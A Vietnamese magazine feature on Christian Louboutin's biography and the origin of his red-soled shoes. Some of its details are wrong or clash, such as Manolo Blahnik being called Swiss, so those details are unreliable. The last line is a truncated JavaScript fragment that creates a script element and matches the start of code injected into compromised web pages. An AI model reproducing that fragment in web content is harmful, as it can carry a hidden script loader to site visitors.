Có thể nói, Christian Louboutin là nhà thiết kế giày nổi tiếng nhất hiện nay với những đôi giày đế đỏ khiến cả thế giới say mê. Vậy đâu là yếu tố quyết định làm nên thành công ồn ào của gã thợ giày gốc Ai Cập sinh sau đẻ muộn kia?
“Tôi là của công việc một người thiết kế giày, chứ không phải là một bác sĩ. Tất nhiên, chúng tôi sẽ tạo ra những đôi giày thoải mái trong khả năng của mình, nhưng thật lòng tôi không trông đợi một khách hàng nào đó bước vào cửa hiệu của mình và thốt lên rằng ‘Ôi, nhìn kìa, những đôi giày thật thoải mái'”.
Đây là câu trả lời của Louboutin khi được đài CBS hỏi rằng ông có tính đến sự thoải mái của người mang khi thiết kế những đôi giày cao gót sát thủ (stilettos) như thế không. Câu nói nổi tiếng đó là minh chứng cho sự độc tài của gã thợ giày người Pháp thích chơi trò trapeze. Trong Thế giới Louboutin, không bao giờ tồn tại sự thỏa hiệp.
Kẻ độc tài, nước Pháp, và những luật lệ
Năm mười một tuổi, Louboutin vẫn còn đang bị dày vò vì ngoại hình không hề giống các thành viên khác trong gia đình của mình với màu da sậm trông không hề giống người Pháp một chút nào. Năm mười hai tuổi, sau ba lần bị đuổi học, Louboutin quyết định đi khỏi nhà, tự tạo lịch sử cho riêng mình, như một người Ai Cập vì niềm say mê vô tận của cậu dành cho các Pharaohs. Cùng năm đó, nhà thiết kế giày người Thuỵ Sĩ Manolo Blahnik đã trở thành một biểu tượng về phong cách thuần cổ điển của thế kỉ 21.
Cậu bé Christian Louboutin trong một lần trốn học đi tới bảo tàng nghệ thuật thành phố African and Oceanic bị ấn tượng mạnh mẽ bởi tấm biển vẽ hình một đôi giày gót nhọn bị gạch chéo bởi một đường màu đỏ, biểu thị sự cấm đoán việc mang giày cao gót để tránh việc làm hư hại sàn nhà được làm từ gỗ cứng. 1970s, thập niên của những đôi giày đế xuồng to bản, Christian chưa bao giờ được thấy một đôi giày giống như thế. Ấn tượng đó khiến Christian nhận ra niềm say mê của mình đối với những đôi giày cao gót để trong những năm sống xa nhà, cậu bé Louboutin – kẻ chưa từng được đào tạo bài bản qua bất kì một trường lớp nào, bắt đầu biến những thiết kế được cậu vẽ khi còn ở trường thành những đôi giày thật cho các nữ vũ công và những cô gái nhảy. Và trong những năm tháng lăn lộn ở các hộp đêm và quán bar khi chưa đủ tuổi, Christian đã gặp Bruno Chambelland – người mà sau này sẽ cùng với Louboutin và người bạn thời niên thiếu Henri Seydoux, sáng lập nên đế chế Christian Louboutin SA vào năm 1991, giữ vững thế “kiềng ba chân” đó trong suốt hơn hai mươi lăm năm, tính đến thời điểm hiện tại.
Christian thể hiện rằng mình thật sự là một Pharaoh trong khối kim tự tháp sơn son thếp vàng hùng vĩ mà gã ngạo nghễ dựng nên giữa lòng nước Pháp ảm đạm với những tông màu trung tính và những thương hiệu thời trang với tuổi đời tính bằng thế kỉ. Có lẽ dự cảm tuổi thơ của cậu bé Louboutin đã đúng. Cha đẻ Louboutin là người Ai Cập, ngoại hình, tính cách và thiết kế của Christian không mang dáng dấp của phong cách thời trang Pháp. Dù ông sinh ra và sống phần lớn đời mình ở kinh đô thời trang này.
Huyền thoại giày đế đỏ
Christian Louboutin là kẻ phá vỡ những nguyên tắc. Điều đó đã được dự báo rất sớm từ ám ảnh thiếu thời của ông, điều đã làm nên cái tên Louboutin cùng những gót giày đỏ đi vào “huyền thoại” của mình. Trái ngược với đa số các tên tuổi của huyền thoại thiết kế Pháp, mà điển hình ở đây là Yves Saint Laurent hay Coco Chanel với tài năng không thể chối từ nhưng với những mảng đời riêng không hề êm đẹp, thì Christian Louboutin như đang đu người trên trò trapeze (một trò nhào lộn với dây trên không mà ông rất thích) trong hào quang của sự nổi tiếng, bất ngờ, kích thích, hào hứng và đầy bỡn cợt.
Giá trị thương hiệu Louboutin có lẽ nằm ở đó, ở sự vượt qua mọi khuôn khổ lề lối của một nhà thiết kế. Trong khi đó, khát khao của tất cả mọi phụ nữ trên hành tinh này có lẽ là được giải phóng và tự do.
Năm 1993, tại studio ở Paris, khi Christian giật lọ sơn móng màu đỏ trên tay cô thư kí Sarah ngồi gần đó để tô lên gót đôi Pensee lấy cảm hứng từ bức Flowers của Andy Warhol khi gã cảm thấy nó vẫn chưa giống bản thiết kếtrên giấy của mình. Và kết quả chính là những gì chúng ta chứng kiến ngày hôm nay. Biểu tượng thời trang “huyền thoại giày đế đỏ Christian Louboutin” và rồi ngạo nghễ trên thanh trapeze của mình khi ra mắt dòng sơn móng thời thượng rằng “Tôi đã trả lại cho bộ móng thứ mà những đôi giày đã lấy đi của chúng từ rất lâu trước đó”.
Mỗi phụ nữ say mê Louboutin đều là một nàng Sarah. Chúng ta bị gã thợ giày cướp đi sắc đỏ quyến rũ, đam mê và quyền lực, rồi trở thành những tín đồ trung thành, say mê và bỏ tiền ra để mua lại thứ mà đáng lẽ ra thuộc về sở hữu riêng của phái nữ và tin rằng gã ta đã vô cùng xuất sắc biến nó thành công cụ để phục vụ nữ giới.
Thư Vũ
var d=document;var s=d.createElement(‘script’);